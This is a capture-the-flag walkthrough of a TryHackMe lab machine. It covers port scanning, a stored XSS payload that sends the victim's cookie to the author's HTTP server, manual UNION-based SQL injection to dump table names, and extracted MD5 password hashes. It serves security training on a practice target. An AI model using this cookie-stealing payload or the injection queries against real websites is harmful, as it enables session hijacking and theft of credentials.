🐇Rabbit Hole

License

The following post by anthonyjsaab is licensed under CC BY 4.0

0 - Introduction

Link to room: https://tryhackme.com/r/room/rabbitholeqq

Machine version: RabbitHole v1.3

This writeup walks you through a room on TryHackMe created by shamollash

1 - Port Scan

1a - Discovery

┌──(kali㉿kali)-[~]
└─$ sudo nmap -T4 -p- rabbit.thm                                                                                            
[sudo] password for kali: 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-25 21:53 EEST
Nmap scan report for rabbit.thm (10.10.45.20)
Host is up (0.096s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 723.03 seconds

1b - Versioning and OS fingerprinting

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sC -sV -O -p22,80 rabbit.thm  
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-26 08:25 EEST
Nmap scan report for rabbit.thm (10.10.187.189)
Host is up (0.095s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.59 ((Debian))
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-title: Your page title here :)
|_http-server-header: Apache/2.4.59 (Debian)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (95%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (93%), Linux 2.6.39 - 3.2 (93%), Linux 3.1 - 3.2 (93%), Linux 3.2 - 4.9 (93%), Linux 3.7 - 3.10 (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.56 seconds

1c - Vulners

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV --script vulners --script-args mincvss=7.5 -p22,80 -Pn rabbit.thm
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-26 08:30 EEST
Nmap scan report for rabbit.thm (10.10.187.189)
Host is up (0.10s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 (protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:8.9p1: 
|     	95499236-C9FE-56A6-9D7D-E943A24B633A	10.0	https://vulners.com/githubexploit/95499236-C9FE-56A6-9D7D-E943A24B633A	*EXPLOIT*
|     	2C119FFA-ECE0-5E14-A4A4-354A2C38071A	10.0	https://vulners.com/githubexploit/2C119FFA-ECE0-5E14-A4A4-354A2C38071A	*EXPLOIT*
|     	CVE-2023-38408	9.8	https://vulners.com/cve/CVE-2023-38408
|     	CVE-2023-28531	9.8	https://vulners.com/cve/CVE-2023-28531
|     	B8190CDB-3EB9-5631-9828-8064A1575B23	9.8	https://vulners.com/githubexploit/B8190CDB-3EB9-5631-9828-8064A1575B23	*EXPLOIT*
|     	8FC9C5AB-3968-5F3C-825E-E8DB5379A623	9.8	https://vulners.com/githubexploit/8FC9C5AB-3968-5F3C-825E-E8DB5379A623	*EXPLOIT*
|     	8AD01159-548E-546E-AA87-2DE89F3927EC	9.8	https://vulners.com/githubexploit/8AD01159-548E-546E-AA87-2DE89F3927EC	*EXPLOIT*
|     	5E6968B4-DBD6-57FA-BF6E-D9B2219DB27A	9.8	https://vulners.com/githubexploit/5E6968B4-DBD6-57FA-BF6E-D9B2219DB27A	*EXPLOIT*
|     	33D623F7-98E0-5F75-80FA-81AA666D1340	9.8	https://vulners.com/githubexploit/33D623F7-98E0-5F75-80FA-81AA666D1340	*EXPLOIT*
|     	0221525F-07F5-5790-912D-F4B9E2D1B587	9.8	https://vulners.com/githubexploit/0221525F-07F5-5790-912D-F4B9E2D1B587	*EXPLOIT*
|     	PACKETSTORM:179290	8.1	https://vulners.com/packetstorm/PACKETSTORM:179290	*EXPLOIT*
|     	FB2E9ED1-43D7-585C-A197-0D6628B20134	8.1	https://vulners.com/githubexploit/FB2E9ED1-43D7-585C-A197-0D6628B20134	*EXPLOIT*
|     	--SNIP--
|     	CVE-2024-6387	8.1	https://vulners.com/cve/CVE-2024-6387
|     	CFEBF7AF-651A-5302-80B8-F8146D5B33A6	8.1	https://vulners.com/githubexploit/CFEBF7AF-651A-5302-80B8-F8146D5B33A6	*EXPLOIT*
|     	--SNIP--
|     	1A779279-F527-5C29-A64D-94AAA4ADD6FD	8.1	https://vulners.com/githubexploit/1A779279-F527-5C29-A64D-94AAA4ADD6FD	*EXPLOIT*
|     	0A8CA57C-ED38-5301-A03A-C841BD3082EC	8.1	https://vulners.com/githubexploit/0A8CA57C-ED38-5301-A03A-C841BD3082EC	*EXPLOIT*
|     	SSV:92579	7.5	https://vulners.com/seebug/SSV:92579	*EXPLOIT*
|     	PACKETSTORM:173661	7.5	https://vulners.com/packetstorm/PACKETSTORM:173661	*EXPLOIT*
|     	F0979183-AE88-53B4-86CF-3AF0523F3807	7.5	https://vulners.com/githubexploit/F0979183-AE88-53B4-86CF-3AF0523F3807	*EXPLOIT*
|     	1337DAY-ID-26576	7.5	https://vulners.com/zdt/1337DAY-ID-26576	*EXPLOIT*
|     	PACKETSTORM:140261	0.0	https://vulners.com/packetstorm/PACKETSTORM:140261	*EXPLOIT*
|     	5C971D4B-2DD3-5894-9EC2-DAB952B4740D	0.0	https://vulners.com/githubexploit/5C971D4B-2DD3-5894-9EC2-DAB952B4740D	*EXPLOIT*
|_    	39E70D1A-F5D8-59D5-A0CF-E73D9BAA3118	0.0	https://vulners.com/githubexploit/39E70D1A-F5D8-59D5-A0CF-E73D9BAA3118	*EXPLOIT*
80/tcp open  http    Apache httpd 2.4.59 ((Debian))
| vulners: 
|   cpe:/a:apache:http_server:2.4.59: 
|     	CVE-2024-38476	9.8	https://vulners.com/cve/CVE-2024-38476
|     	CVE-2024-38474	9.8	https://vulners.com/cve/CVE-2024-38474
|     	A5425A79-9D81-513A-9CC5-549D6321897C	9.8	https://vulners.com/githubexploit/A5425A79-9D81-513A-9CC5-549D6321897C	*EXPLOIT*
|     	CVE-2024-38475	9.1	https://vulners.com/cve/CVE-2024-38475
|     	0486EBEE-F207-570A-9AD8-33269E72220A	9.1	https://vulners.com/githubexploit/0486EBEE-F207-570A-9AD8-33269E72220A	*EXPLOIT*
|     	CVE-2024-38473	8.1	https://vulners.com/cve/CVE-2024-38473
|     	249A954E-0189-5182-AE95-31C866A057E1	8.1	https://vulners.com/githubexploit/249A954E-0189-5182-AE95-31C866A057E1	*EXPLOIT*
|     	23079A70-8B37-56D2-9D37-F638EBF7F8B5	8.1	https://vulners.com/githubexploit/23079A70-8B37-56D2-9D37-F638EBF7F8B5	*EXPLOIT*
|     	CVE-2024-40898	7.5	https://vulners.com/cve/CVE-2024-40898
|     	CVE-2024-39573	7.5	https://vulners.com/cve/CVE-2024-39573
|     	CVE-2024-38477	7.5	https://vulners.com/cve/CVE-2024-38477
|     	CVE-2024-38472	7.5	https://vulners.com/cve/CVE-2024-38472
|     	CDC791CD-A414-5ABE-A897-7CFA3C2D3D29	7.5	https://vulners.com/githubexploit/CDC791CD-A414-5ABE-A897-7CFA3C2D3D29	*EXPLOIT*
|_    	B5E74010-A082-5ECE-AB37-623A5B33FE7D	7.5	https://vulners.com/githubexploit/B5E74010-A082-5ECE-AB37-623A5B33FE7D	*EXPLOIT*
|_http-server-header: Apache/2.4.59 (Debian)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.91 seconds

2 - Web server probing

2a - Inspection

Note that dirbusting does not uncover any hidden pages.

2b - Normal user interaction

2c - Attempting XSS

When we logged in, the username of the admin was echoed on our webpage. Additionally, the admin appears to login every minute. If their landing page is the same as ours, and they are listed all the users and their last logins, an XSS attempt could let us steal their cookie.

After spinning up an HTTP server on our Kali machine, we will try to register using the following payload as a username:

<script>new Image().src="http://10.11.85.12/cookie.php?cookie="+document.cookie</script>

After logging in, we receive our own cookie:

┌──(kali㉿kali)-[~]
└─$ python -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.11.85.12 - - [26/Oct/2024 09:13:19] code 404, message File not found
10.11.85.12 - - [26/Oct/2024 09:13:19] "GET /cookie.php?cookie=PHPSESSID=17ac77983f5af39a34b0a8bfda8a09a1 HTTP/1.1" 404 -

This means that our payload was stored correctly and is correctly rendering on a browser.

We wait a bit for the admin to login again and trigger the payload on their browser. Unfortunately, after multiple minutes, no request was received on our HTTP server. We can confirm that the admin was logging in during our waiting by refreshing and seeing their attempts:

2d - SQLi

In the above image, we can see that our payload triggered an SQL error message to be displayed. This is a clear indication that the target is vulnerable to SQLi.

However, since "anti-bruteforce" measures are in place, we will avoid using sqlmap and will instead be doing everything manually.

2di - Enumerating how many columns needed for successful UNION with previous SQL statement

2dii - Enumerating tables

User 9 - " UNION SELECT null, TABLE_NAME FROM information_schema.tables; -- last logins
ALL_PLUGINS
APPLICABLE_ROLES
CHARACTER_SETS
CHECK_CONSTRAINT
COLLATIONS
COLLATION_CHARAC
COLUMNS
COLUMN_PRIVILEGE
ENABLED_ROLES
ENGINES
EVENTS
FILES
GLOBAL_STATUS
GLOBAL_VARIABLES
KEYWORDS
KEY_CACHES
KEY_COLUMN_USAGE
KEY_PERIOD_USAGE
OPTIMIZER_COSTS
OPTIMIZER_TRACE
PARAMETERS
PARTITIONS
PERIODS
PLUGINS
PROCESSLIST
PROFILING
REFERENTIAL_CONS
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGE
SESSION_STATUS
SESSION_VARIABLE
STATISTICS
SQL_FUNCTIONS
SYSTEM_VARIABLES
TABLES
TABLESPACES
TABLE_CONSTRAINT
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS
CLIENT_STATISTIC
INDEX_STATISTICS
INNODB_FT_CONFIG
GEOMETRY_COLUMNS
INNODB_SYS_TABLE
SPATIAL_REF_SYS
USER_STATISTICS
INNODB_TRX
INNODB_CMP_PER_I
INNODB_METRICS
INNODB_FT_DELETE
INNODB_CMP
THREAD_POOL_WAIT
INNODB_CMP_RESET
THREAD_POOL_QUEU
TABLE_STATISTICS
INNODB_SYS_FIELD
INNODB_BUFFER_PA
INNODB_LOCKS
INNODB_FT_INDEX_
INNODB_CMPMEM
THREAD_POOL_GROU
INNODB_CMP_PER_I
INNODB_SYS_FOREI
INNODB_FT_INDEX_
INNODB_BUFFER_PO
INNODB_FT_BEING_
INNODB_SYS_FOREI
INNODB_CMPMEM_RE
INNODB_FT_DEFAUL
INNODB_SYS_TABLE
INNODB_SYS_COLUM
INNODB_SYS_TABLE
INNODB_SYS_INDEX
INNODB_BUFFER_PA
INNODB_SYS_VIRTU
user_variables
INNODB_TABLESPAC
INNODB_LOCK_WAIT
THREAD_POOL_STAT
users
logins

2diii - users table

After some more enumeration, here is the list of hashes we get:

0e3ab8e45ac1163c2343990e427c66ff
a51e47f646375ab6bf5dd2c42d3e6181
de97e75e5b4604526a2afaed5f5439d7
098f6bcd4621d373cade4e832627b4f6
202cb962ac59075b964b07152d234b70

Here are the cracking results:

Trying to crack the first MD5 hash using rockyou.txt did not yield anything. Logging in using foo or bar does not give us anything good.

The passwords of foo and bar seem to indicate that we are in a rabbit hole.

PreviousPyrat NextTryHack3M: Bricks Heist

Last updated 1 year ago

Was this helpful?